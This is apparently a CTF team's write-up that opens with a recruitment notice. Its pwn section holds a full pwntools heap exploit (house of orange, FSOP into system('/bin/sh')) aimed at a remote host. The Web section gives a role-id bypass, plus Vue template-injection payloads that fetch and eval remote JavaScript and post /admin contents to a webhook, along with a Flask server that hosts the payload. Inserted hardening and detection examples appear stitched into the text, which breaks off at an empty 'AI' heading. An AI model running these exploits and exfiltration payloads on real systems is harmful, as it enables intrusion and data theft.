Recruitment notice: the CTF team is recruiting players for the re, crypto, pwn, misc and smart-contract tracks on a long-term basis. The IoT, Car, ICS and sample-analysis groups are also hiring. Interested players please contact
[email protected] (attach your resume and the group you want to join)
Pwn
ezheap
The size passed to edit is user-controlled, so there is a heap overflow.
free is a fake (fake_free), so chunks cannot be released directly; instead use house of orange.
Hooks are disabled, so go straight for the IO (FSOP) chain.
from pwn import *

libc = ELF('./libc-2.27.so')
elf = ELF('./pwn')
p = remote('113.201.14.253', 20791)

# Menu wrappers for the challenge binary
def add(size):
    p.sendlineafter('it:', '1')
    p.sendlineafter('dd:', str(size))

def show(idx):
    p.sendlineafter('it:', '3')
    p.sendlineafter('how:', str(idx))

def edit(idx, size, content):
    # size is not checked against the chunk size: this is the overflow
    p.sendlineafter('it:', '4')
    p.sendlineafter('it:', str(idx))
    p.sendlineafter('ize', str(size))
    p.sendlineafter('put', content)

def pwn():
    # Overwrite top chunk size (house of orange) so the next large request
    # pushes the old top chunk into the unsorted bin
    add(0x100)  # 0
    edit(0, 0x110, b'a' * 0x108 + p64(0xca1))
    add(0x1000)  # 1
    add(0xc70)   # 2
    show(2)
    p.recvuntil('2: ')
    libc.address = u64(p.recv(6).ljust(8, b'\x00')) - 0x3ebca0
    print('libc:', hex(libc.address))
    stdout = libc.address + 0x3ec760
    wfile_jump = libc.address + 0x3e7d60

    # Build two fake 0x210 chunks and point a freed chunk's fd at stdout
    add(0xdb0)  # 3
    add(0x10)   # 4
    edit(4, 0x20, b'a' * 0x18 + p64(0x211))
    add(0xdc0)  # 5
    add(0x10)   # 6
    edit(6, 0x20, b'a' * 0x18 + p64(0x211))
    add(0x1000)  # 7
    edit(6, 0x28, b'a' * 0x18 + p64(0x1f1) + p64(stdout))

    # Fake _IO_FILE placed over stdout
    fake_io = flat({
        0x0: b' sh',
        0xa0: p64(stdout - 0x130 + 0xd8),
        0x10: p64(libc.symbols['system']),
        0x20: p64(stdout),
        0x98: p64(stdout - 0x20 + 0x80),
        0xd8: p64(wfile_jump + 0x48 - 0x38),
        0x60: b'/bin/sh\x00',
        0x80: p64(libc.symbols['system']),
        0x88: p64(stdout - 0x30),
        0xe0: p64(stdout - 8),
    }, filler=b'\x00')
    add(0x1e0)  # 8
    add(0x1e0)  # 9 lands on stdout
    edit(9, len(fake_io), fake_io)
    p.interactive()

pwn()
Web
OnlyBypassMe
/swagger-ui/index.html
/v3/api-docs/
http://968aabc1.clsadp.com/v3/api-docs/login
A roleid of 1 makes the user admin.
/api/v1/users/updatePermission
Sending 1.0 bypasses the number check.
Get the flag.
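The bypass above is a loose-validation bug: the server blocks the literal admin role id but coerces what it receives into a number afterwards. The following added example (not from the challenge; the handler shapes and role ids are constructed assumptions) shows a weak check that a float or boolean slips past, next to a strict one that only accepts a JSON integer from an allowlist.

```python
import json

ADMIN_ROLE = 1            # constructed: the privileged role id, as in the writeup
SELF_ASSIGNABLE = {2, 3}  # constructed: roles a user may set on their own account


def weak_update_permission(payload: str) -> int:
    """Weak check: compares the textual form, then coerces to int.
    json.loads gives 1.0 for the body {"roleid": 1.0} and True for
    {"roleid": true}; neither stringifies to "1", but int() turns both into 1."""
    data = json.loads(payload)
    roleid = data["roleid"]
    if str(roleid) == "1":
        raise PermissionError("cannot self-assign admin")
    return int(roleid)


def strict_update_permission(payload: str) -> int:
    """Hardened check: the value must be a JSON integer (bool is a subclass of
    int, so an exact type test is needed) and must be on the allowlist."""
    data = json.loads(payload)
    roleid = data.get("roleid")
    if type(roleid) is not int:
        raise ValueError("roleid must be a JSON integer")
    if roleid not in SELF_ASSIGNABLE:
        raise PermissionError("role not self-assignable")
    return roleid


def outcome(handler, payload: str) -> str:
    """Summarise what a handler does with a body, for comparing the two checks."""
    try:
        return "role=%d" % handler(payload)
    except PermissionError:
        return "denied"
    except ValueError:
        return "rejected"


# Constructed request bodies, not captured from the challenge
BODIES = {
    "int":   '{"roleid": 1}',
    "float": '{"roleid": 1.0}',
    "bool":  '{"roleid": true}',
    "user":  '{"roleid": 2}',
}

if __name__ == "__main__":
    for name, body in BODIES.items():
        print(name, "weak:", outcome(weak_update_permission, body),
              "strict:", outcome(strict_update_permission, body))
```

The weak handler promotes the float and boolean bodies to role 1 because the comparison and the coercion disagree about what the value is; the strict handler validates the type before any comparison, so there is nothing left to coerce.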
CrossVue
The Docker image doesn't seem to build, so work on it locally.
/view: look for the Vue XSS.
profileRegex := regexp.MustCompile(`^.{0,80}$`)
{{}} interpolation can execute JS.
{{fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69').then(a=>a.text().then(a=>eval(a)))}}
{{fetch('/admin').then(r=>r.text()).then(r=>fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69/',{method:'POST',body:r}))}}
This one works, but it is currently 137 characters and needs to be cut to 80.
solution1: fetch the JS from a remote host, which shortens it a lot: {{fetch('http://116.198.40.182:19002/').then(a=>a.text().then(a=>eval(a)))}}
This should work, but I couldn't get it through locally. Anyway, first throw together a py that serves the XSS; the current webhook domain is too long.
from flask import Flask, Response

app = Flask(__name__)

@app.after_request
def after_request(response):
    # Allow the victim page to fetch the script cross-origin
    response.headers.add('Access-Control-Allow-Origin', '*')
    response.headers.add('Access-Control-Allow-Headers', 'Content-Type')
    response.headers.add('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
    return response

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def serve_js(path):
    # Served on every path so the short payload URL needs no filename
    js_content = "{{fetch('/admin').then(r=>r.text()).then(r=>fetch('https://webhook.site/af995845-1d8a-4e49-97be-eccd2994ce69/',{method:'POST',body:r}))}}"
    # js_content = "{\"html\":\"
    # \"}"
    return Response(js_content, mimetype='application/javascript')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=19002)
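The only server-side control on the profile is the Go regex ^.{0,80}$, which limits length and nothing else, so a short {{ }} payload passes. The following added example (not from the challenge; the Python re-implementation of the check, the placeholder host and the sample profiles are constructed) mirrors that length-only check, shows it accepting an interpolation payload, and puts a stricter validator and a stored-data triage function beside it.

```python
import re
import html

# Mirror of the challenge's Go check ^.{0,80}$ : with fullmatch and no DOTALL,
# Python also refuses newlines and anything longer than 80 characters.
LENGTH_ONLY = re.compile(r'.{0,80}')
# Vue text-interpolation delimiters; a profile compiled as a template evaluates
# whatever sits between them.
MUSTACHE = re.compile(r'\{\{.*?\}\}', re.DOTALL)


def passes_length_check(profile: str) -> bool:
    """What the original regex decides."""
    return LENGTH_ONLY.fullmatch(profile) is not None


def contains_interpolation(profile: str) -> bool:
    return MUSTACHE.search(profile) is not None


def sanitize_profile(profile: str) -> str:
    """Hardened version: keep the length limit, refuse template delimiters,
    and HTML-escape so the value is safe to drop into markup as text."""
    if not passes_length_check(profile):
        raise ValueError("profile longer than 80 characters or contains a newline")
    if contains_interpolation(profile):
        raise ValueError("template delimiters are not allowed in a profile")
    return html.escape(profile, quote=True)


def triage(profiles):
    """Detection view over stored data: profiles that the old check accepted
    but that carry an interpolation block."""
    return [p for p in profiles if passes_length_check(p) and contains_interpolation(p)]


# Constructed samples, not taken from the challenge database
BENIGN = "Security engineer, likes Go and Vue."
# Same shape as the writeup's shortened payload, with a placeholder host;
# well under 80 characters, so the length check alone lets it through.
PAYLOAD = "{{fetch('https://x.example/').then(a=>a.text().then(eval))}}"

if __name__ == "__main__":
    for p in (BENIGN, PAYLOAD):
        print(len(p), passes_length_check(p), contains_interpolation(p))
    print(triage([BENIGN, PAYLOAD]))
```

Note that html.escape on its own does not stop this class of bug: braces are not HTML-special, so an escaped profile still interpolates if the application compiles it as a Vue template. The delimiter check is a server-side stopgap; the real fix is to render the profile as data (a text binding or v-pre) rather than as template source.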
AI